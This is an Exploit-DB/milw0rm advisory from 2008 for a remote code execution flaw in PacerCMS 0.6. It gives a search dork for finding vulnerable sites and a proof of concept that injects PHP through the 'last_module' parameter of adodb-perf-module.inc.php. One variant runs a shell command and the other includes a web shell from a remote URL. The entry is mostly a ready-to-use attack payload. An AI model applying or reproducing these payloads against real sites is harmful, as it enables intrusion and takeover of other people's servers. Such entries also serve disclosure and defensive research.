PacerCMS 0.6 - 'last_module' Remote Code Execution

EDB-ID:

5098

Author:

GoLd_M

Type:

webapps

Platform:

PHP

Published:

2008-02-10

### PacerCMS 0.6 (last_module) Remote Code Execution Vulnerability
### Script : http://ovh.dl.sourceforge.net/sourceforge/pacercms/pacercms0.6.zip
### Dork : Powered by PacerCMS
### POC :
###     /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);//
###     OR INCLUDE SHELL
###     /includes/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};include(URL-SHELL);//
###  I'm TrYaGi ......:)

# milw0rm.com [2008-02-10]